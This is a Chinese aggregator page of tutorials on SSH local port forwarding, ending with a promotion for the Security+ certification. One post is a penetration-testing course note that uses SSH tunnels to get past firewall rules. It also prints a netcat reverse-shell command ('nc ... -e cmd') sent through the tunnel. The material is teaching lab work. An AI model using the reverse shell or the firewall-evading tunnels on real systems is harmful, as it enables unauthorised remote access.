精华内容
下载资源
问答
  • ssh本地端口转发

    2021-03-29 10:23:05
    问题 学习 波卡 时,他的 rpc 参数总是只能 rpc=ws://127.0.0.1:9944,如下 ...先去配置ssh本地端口转发以将本地请求转发给ws-port远程主机 命令是这样子的 ssh -L :: 理解总是费脑的,实例对照最省心 例子 将

    问题

    学习 波卡 时,他的 rpc 参数总是只能 rpc=ws://127.0.0.1:9944,如下

    https://polkadot.js.org/apps/#/explorer?rpc=ws://127.0.0.1:9944

    但是,我们的 rust 服务端放在远程,放在自己的电脑上太浪费空间和内存!
    而且,自己的电脑总会关机,下次还要重新运行程序

    解决方案

    先去配置ssh本地端口转发以将本地请求转发给ws-port远程主机

    命令是这样子的
    ssh -L ::

    理解总是费脑的,实例对照最省心

    例子

    将自己本机 Mac 上 7777 端口,转发到 远程服务器上是 ubuntu (192.168.1.194)的 6666 端口

    ssh -L 7777:localhost:6666 user123 @221.122.XXX.XXX
    
    最好两端使用相同的用户名,就可以省略了
    ssh -L 7777:localhost:6666 221.122.XXX.XXX
    

    测试:(需要打开 2 个 Terminal )

    1、 在远程 已经连接的 Terminal 上 ,listen 6666 端口

    	$ nc -l 6666
    

    2、在 Mac 本地再打开一个 terminal,也用 nc 连接到 7777 端口,
    然后键盘随意输入,同时会在前一个 terminal 上出现

    	$ nc -v localhost 7777
    	Connection to localhost port 7777 [tcp/cbt] succeeded!
    	111
    	222
    

    实际使用

    ssh -L 9944:localhost:9944 221.122.XXX.XXX

    再来打开波卡
    https://polkadot.js.org/apps/#/explorer?rpc=ws://127.0.0.1:9944

    现在就会看到远程 221.122.XXX.XXX 的 ws 连接 ok!

    展开全文
  • SSH 本地端口转发

    2019-09-22 00:51:42
    为了区别后文的"远程端口转发",我们把这种情况称为"本地端口转发"(Local forwarding)。  假定host1是本地主机,host2是远程主机。由于种种原因,这两台主机之间无法连通。但是,另外还有一台host3,可以同时...

      有时,绑定本地端口还不够,还必须指定数据传送的目标主机,从而形成点对点的"端口转发"。为了区别后文的"远程端口转发",我们把这种情况称为"本地端口转发"(Local forwarding)。

      假定host1是本地主机,host2是远程主机。由于种种原因,这两台主机之间无法连通。但是,另外还有一台host3,可以同时连通前面两台主机。因此,很自然的想法就是,通过host3,将host1连上host2。

      我们在host1执行下面的命令:

    $ ssh -L 2121:host2:21 host3

      命令中的L参数一共接受三个值,分别是"本地端口:目标主机:目标主机端口",它们之间用冒号分隔。这条命令的意思,就是指定SSH绑定本地端口2121,然后指定host3将所有的数据,转发到目标主机host2的21端口(假定host2运行FTP,默认端口为21)。

      这样一来,我们只要连接host1的2121端口,就等于连上了host2的21端口。

    $ ftp localhost:2121

      "本地端口转发"使得host1和host3之间仿佛形成一个数据传输的秘密隧道,因此又被称为"SSH隧道"。

    下面是一个比较有趣的例子。

    $ ssh -L 5900:localhost:5900 host3  

      它表示将本机的5900端口绑定host3的5900端口(这里的localhost指的是host3,因为目标主机是相对host3而言的)。

      另一个例子是通过host3的端口转发,ssh登录host2。

    $ ssh -L 9001:host2:22 host3

      这时,只要ssh登录本机的9001端口,就相当于登录host2了。

    $ ssh -p 9001 localhost

      上面的-p参数表示指定登录端口。

    转载于:https://www.cnblogs.com/hopkings/p/6442057.html

    展开全文
  • SSH本地端口转发

    2015-01-30 11:06:00
    也是在公司常用的命令,还没有将EXPECT和SPAWN结合好,先用着...ssh -C -f -N -g -i private_key -L 公司内网IP:内网指定端口:外部服务器的转发内网IP:forward_port user@外网服务器IP -p外网服务器SSH端口 (从外网...

    也是在公司常用的命令,还没有将EXPECT和SPAWN结合好,先用着:

    带证书验证远程登陆的。

    (从公司内网服务器直接跳到外网服务器的内网端口)

    ssh -C -f -N -g -i private_key  -L 公司内网IP:内网指定端口:外部服务器的转发内网IP:forward_port user@外网服务器IP -p外网服务器SSH端口

    (从外网服务器指定端口跳到外网服务器的内网端口)

    ssh -C -f -N -g -i key.pub -L 外网服务器IP:服务器指定端口:外网服务器的转发内网IP:forward_port user@外网服务器的内网IP -p外网SSH端口

     

    均需要相关密码和证书

    展开全文
  • SSH隧道 SSH支持双向通信隧道  - 将其他TCP端口的通信通过SSH连接来转发 ... - 用SSH作为传输层协议,对流量自动加解密 ... - 突破防火墙访问规则的限制,可用于翻墙 ...SSH本地端口转发

    SSH隧道                                     

    SSH支持双向通信隧道                         

        - 将其他TCP端口的通信通过SSH连接来转发  

        - 用SSH作为传输层协议,对流量自动加解密

        - 突破防火墙访问规则的限制,可用于翻墙  

    SSH本地端口转发                             

        - 使效果类似于rinetd                    

        - 将一本地端口与远程服务器建立隧道

    SSH隧道                                       

    建立双向安全隧道                              

        - 将其他TCP端口的通信通过SSH链接来转发    

        - 用SSH作为传输层协议,对流量自动加密解密

        - 突破防火墙访问规则的限制,可用于翻墙    

    本地端口转发                                  

        - 本地侦听端口,访问转发到远程主机指定端口

    远程端口转发                                  

        - 远程侦听端口,访问转发到本机主机指定端口

    动态隧道模式

    SSH本地端口转发                 

    将一本端与远程服务器建立隧道    

    /etc/ssh/sshd_config            

        - PermitRootLogin yes       

        - Port 53                   

        - PasswordAuthentication yes

    service ssh restart

    **** This is mOnOwall, version 1.8.1

         built on Web Jan 15 13:32:38 GET 2014 for generic-pc

         Copyright (C) 2002-2014 by Manuel Kasper. All rights reserved.

         Visit http://mOnO.ch/wall for updates.

         LAN IP address: 192.168.1.1

         WAN IP address: (unknown)

         Port configuration:

         LAN    -> em0

         WLAn   -> em1

    mOnOwall console setup

    *********************

    1) Interfaces: assign network ports

    2) Set up LAN IP address

    3) Reset webGUI password

    4) Reset to factory defaults

    5) Reboot system

    6) Ping host

    7) Install on Hard Drive

    Enter a number: 5

    The firewall will reboot. This may take one minute.

    Do you want to proceed? (y/n) y

    The firewall is rebooting now.

    root@K:~# arp -an

    ? (192..168.1.123) at 80:00:27:2c:11:c8 [ether] on eth0

    ? (192.168.1.1) at 14:75:90:21:4f:56 [ether] on eth0

    root@K:~# vi /etc/ssh/sshd_config

    port 53

    #PermitRootLogin prohibit-password

    PermitRootLogin yes

    PasswordAuthentication yes

    root@K:~# service ssh start

    root@K:~# netstat -pautu | grep :53

    tcp        0      0 0.0.0.0:53         0.0.0.0:*            LISTEN      2960/sshd

    tcp6       0      0 :::53              :::*                LISTEN      2960/sshd

    SSH本地端口转发                                            

    ssh -fNG -L <liste port>:<remote ip>:<remote port>          

    user@<ssh server> -p <ssh server port>                      

    ssh -fNG -L <listen port>:localhost:<remote port> user@<ssh

    server> -p <ssh port>                                      

    -f 后台运行程序                                            

    -N 不执行登陆shell                                          

    -g 复用访问时作为网管,支持多主机访问本地侦听端口           

    网管模式转发RDP、NC shell

    bodhi@bodhi:~$ ssh -L 7001:192.168.1.124:80 root@192.168.110 -p 53

    The authenticity of host '[192.168.1.110]:53 ([192.168.1.110):53)' can't be establishded

    ECDSA key fingerprint is 6f:bf:fc:e5:d0:96:65:34:99:7d:81:06:b6:5e:44:50.

    Are you sure you want to continue connectiong (yes/no)? yes

    Warning: Permanently added '[192.168.1.110]:53' (ECDSA) to the list of known hosts.

    root@192.168..110's password:

    The programs included wiht the Kali GNU/Linux system are free software;

    the exact distribution terms for each program are described in the

    individual files in /user/share/doc/*/copyright.

    Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

    perimitted by applicatble law.

    bodhi@bodhi:~$ netstat -pantu | grep 7001

    (Not all processes could be identified, non-owned proces info

     will not be shown, you would have to be root to see it all)

    tcp        0      0 127.0.0.1:7001        0.0.0.0:*           LISTEN      2375/sshd

    tcp6       0      0 ::1:7001              :::*                LISTEN      2375/sshd

    bodhi@bodhi:~$ netstat -pantu | grep :53

    (Not all processes could be identified, non-owned proces info

     will not be shown, you would have to be root to see it all)

    tcp        0      0 127.0.1.1:53            0.0.0.0:*         LISTEN      -

    tcp        0      0 1.1.1.10:59626          192.168.1.110:53  ESTABLISHED 2375/ssh

    udp        0      0 0.0.0.0:5353            0.0.0.0:*                     -

    udp        0      0 127.0.0.1:53            0.0.0.0:*                     -

    udp6       0      0 :::5353                 :::*                          -

    root@K:~# openvas-stop

    Stopping Openvas Services

    root@K:~# service apache2 start

    root@K:~# exit

    logout

    bodhi@bodhi:~$ netstat -pantu | grep :53

    (Not all processes could be identified, non-owned proces info

     will not be shown, you would have to be root to see it all)

    tcp        0      0 127.0.1.1:53            0.0.0.0:*         LISTEN      -

    tcp        0      0 1.1.1.10:59624          192.168.1.110:53  TIME_WAIT   -

    udp        0      0 0.0.0.0:5353            0.0.0.0:*                     -

    udp        0      0 127.0.0.1:53            0.0.0.0:*                     -

    udp6       0      0 :::5353                 :::*                          -

    bodhi@bodhi:~$ ssh -CfN -L 7001:192.168.1.124:80 root@192.168.110 -p 53   

    //打开连接不建立窗口,后台运行,压缩节省带宽

    bodhi@bodhi:~$ ssh -CfN -L 7002:192.168.1.124:80 root@192.168.110 -p 53

    bodhi@bodhi:~$ netstat -pantu | grep :53

    (Not all processes could be identified, non-owned proces info

     will not be shown, you would have to be root to see it all)

    tcp        0      0 127.0.1.1:53            0.0.0.0:*         LISTEN      -

    tcp        0      0 1.1.1.10:59628          192.168.1.110:53  ESTABLISHED 2375/ssh

    tcp        0      0 1.1.1.10:59626          192.168.1.110:53  ESTABLISHED 2431/ssh

    udp        0      0 0.0.0.0:5353            0.0.0.0:*                     -

    udp        0      0 127.0.0.1:53            0.0.0.0:*                     -

    udp6       0      0 :::5353                 :::*                          -

    bodhi@bodhi:~$ ssh -fN -L 7003:192.168.1.124:3389 root@192.168.110 -p 53

    bodhi@bodhi:~$ netstat -pantu | grep :53

    (Not all processes could be identified, non-owned proces info

     will not be shown, you would have to be root to see it all)

    tcp        0      0 127.0.1.1:53            0.0.0.0:*         LISTEN      -

    tcp        0      0 1.1.1.10:59628          192.168.1.110:53  ESTABLISHED 2375/ssh

    tcp        0      0 1.1.1.10:59624          192.168.1.110:53  ESTABLISHED 2449/ssh

    tcp        0      0 1.1.1.10:59626          192.168.1.110:53  ESTABLISHED 2431/ssh

    udp        0      0 0.0.0.0:5353            0.0.0.0:*                     -

    udp        0      0 127.0.0.1:53            0.0.0.0:*                     -

    udp6       0      0 :::5353                 :::*                          -

    bodhi@bodhi:~$ sudo apt-get install rdesktop

    Reading package lists... Done

    Building dependency tree

    Reading state information... Done

    Suggested packages:

      puscd

    The following NEW packages will be installed:

      rdesktop

    0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.

    Need to get 139 kB of archives.

    After this operation, 427 kB of additional disk space will be used.

    Get:1 http://us.archive.ubuntu.com/ubuntu/ trusty/universe rdesktop amd64 1.7.1-1ubuntu2 [139 kB]

    Fetched 139 kB in 2s (60.4 kB/s)

    Selecting preciously unselected package rdesktop.

    (Reading database ... 125707 files and directiories currently installed.)

    Prepar to unpack .../rdesktop_1.7.1-1ubuntu2_amd64.deb ...

    Unpacking rdesktop (1.7.1-1ubuntu2) ...

    Processing triggers for man-db (2.6.7.1-1ubuntu1) ...

    Setting up rdesktop (1.7.1-1ubuntu2) ...

    bodhi@bodhi:~$ rdesktop 127.0.0.1:7003

    bodhi@bodhi:~$ netstat -pantu | grep 7003

    (Not all processes could be identified, non-owned proces info

     will not be shown, you would have to be root to see it all)

    tcp        0      0 127.0.0.1:7003        0.0.0.0:*           LISTEN      2448/sshd

    tcp6       0      0 ::1:7003              :::*                LISTEN      2448/sshd

    bodhi@bodhi:~$ ssh -fN -L 7004:192.168.1.124:3389 root@192.168.110 -p 53

    bodhi@bodhi:~$ netstat -pantu | grep 7004

    (Not all processes could be identified, non-owned proces info

     will not be shown, you would have to be root to see it all)

    tcp        0      0 127.0.0.1:7004        0.0.0.0:*           LISTEN      2893/sshd

    tcp6       0      0 ::1:7004              :::*                LISTEN      2893/sshd

    bodhi@bodhi:~$ rdesktop 1.1.1.10:7004

    C:\>nc -nvlp 3333

    listening on [any] 3333 ...

    connect to [192.168.1.124] from <UNKNOWN> [192.168.1.110] 42598

    Microsoft Windows XP [版本 5.1.2600]

    <C> 版权所有 1985-2001 Microsoft Corp.

    C:\>nc 1.1.1.10 7005 -e cmd

    bodhi@bodhi:~$ ssh -CfNg -L 7005:192.168.1.124:3333 root@192.168.110 -p 53

    SSH本地端口转发                                      

    端口转发基于建立起来的SSH隧道,隧道中断则端口转发中断

    只能在建立隧道时创建转发,不能为已有隧道增加端口转发

    该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

    Security+认证为什么是互联网+时代最火爆的认证?


          牛妹先给大家介绍一下Security+


            Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

           通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

    Security+认证如此火爆的原因?  

           原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

          目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

           原因二: IT运维人员工作与翻身的利器。

           在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

            原因三:接地气、国际范儿、考试方便、费用适中!

    CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

            在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。



    展开全文
  • 本地端口转发(Local Port Forwarding),如上图。应用场景:通过访问本地网络中的某端口从而访问远程网络的指定端口。比如远程网络主机S1中在端口18702运行了一个服务,但是远程主机并没有对外开放此18702端口,这时...
  • git远程外网地址变内网怎么破(ssh本地端口转发)?最近给longtubas上了负载均衡,相对来说我们并发并不高,但希望可用性尽可能高,本来打算用不饱和的机器做个lvs集群的,但IDC说给个额外的公网ip需要申请机器,推荐...
  • 1.我在PC1-->PC2的SSH连接上配置了端口转发(通过SecureCRT),配置如下: ![PC1->PC2的SSH连接](https://img-ask.csdn.net/upload/201510/21/1445393185_835828.png) ![本地端口6000转发到VM]...
  • 本地转发: 1.现在一种情况是,有一个可以远程连接得服务器123.0.0.1,端口号为2222.然后在内网机器192.168.1.110上部署了数据库,端口号为5434.此时如果我想从本地运行代码,需要连接数据库;这是就需要将远程服务器当...
  • 远程主机(10.64.1.129)需求: ... 假设远程主机打开了ssh端口 2. 启动了PostgreSQL,且监听端口为默认的5432 3. 远程主机的postgreSQL DB只允许localhost访问 本地主机(10.64.71.6)需求: 1. 安装了pg...
  • 本文为大家详细介绍了SSH端口转发,本地端口转发,远程端口转发,动态端口转发等相关知识
  • ssh远程端口转发本地Ssh protocol secures remote connections which are shell or terminal-based to the remote systems. Ssh protocol and tool provides more than that. We can use sshto create tunnels ...
  • 通过本文的介绍,读者可以从中了解到如何应用 SSH 端口转发机制来解决日常工作 / 生活中的一些问题。学会在非安全环境下使用端口转发来加密网络应用,保护个人隐私以及重要商业信息。同时也能够用此技术解决工作中...
  • SSH端口转发:本地转发Local Forward和远程转发Remote Forward关于使用ssh portforwarding来进行翻墙的操作,网络上已经有很多很好的文章,我在这里只是画两个图解释一下。首先要记住一件事情就是:SSH 端口转发自然...
  • SSH 远程端口转发

    2020-03-31 20:39:12
    SSH远程端口转发是一个很实用的功能,它能够通过ssh打开两台主机的通道。比如通过一台有公网IP的设备访问只有内网IP的设备。本文主要讲解如何开启SSH远程端口转发,转发失败的可能原因。 SSH远程端口转发,是将访问...
  • ssh 端口转发

    2019-11-13 22:33:55
    ssh本地端口转发 (1)SSH 支持双向通信隧道 将其他 TCP 端口的通信通过 SSH 链接来转发 用 SSH 作为传输协议,对流量自动加解密 突破防火墙访问规则的限制,可用于翻墙 (2)SSH 本地端口转发 使效果类似于 rinetd 将一...
  • 使用SSH端口转发以及反向隧道

    千次阅读 2019-06-01 22:30:26
    SSH本地端口转发 SSH做反向隧道(远程端口转发) 用autossh建立稳定隧道 SSH开启端口转发需要修改 /etc/ssh/sshd_config配置文件,将 GatewayPorts修改为yes -f 后台执行ssh指令 -C 允许压缩数据 -N 不执行...
  • 实验条件:1.本文所述之实验,本地主机操作系统基于Ubuntu 10.04,远程主机操作系统基于BSD发行版2.本地主机安装了ssh client(ssh),也安装了ssh server(sshd)基础知识:文章中...SSH端口转发格式[1][-L [bind_addre...
  • ssh实现端口转发

    2019-06-14 15:50:53
    ssh实现端口转发环境及目标使用ssh实现 环境及目标 环境 机器manager1:192.168.0.41 机器manager2:192.168.0.42 web项目部署在manager1上,端口为8080。 目标 将192.168.0.42的80端口转发到192.168.0.41的8080端口...
  • SSH端口转发实验

    2018-06-04 16:09:26
    一、SSH端口转发相关概念二、实验:模拟SSH本地端口转发三、实验:模拟SSH远程端口转发四、实验:模拟SSH动态端口转发 一、SSH端口转发相关概念在上一节我们知道,SSH会自动加密和解密所有SSH客户端和服务器之间的...
  • SSH端口本地转发

    2020-09-11 20:29:06
    本地端口转发(Local Port Forwarding),是将本地主机某个端口流量转发到远程主机的指定端口。 其命令行语法是: ssh -L [bind_address]:<local port>:[remote host]:<remote port> &
  • 文章目录网络拓扑图SSH本地端口转发桌面工作站访问实验室机器(免登录跳板机)实验室机器访问外网(本地转发)SSH远程端口转发SSH动态端口转发 网络拓扑图 为了方便讲解命令和原理,假想了一个常见的网络拓扑场景,主要...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 18,701
精华内容 7,480
关键字:

ssh本地端口转发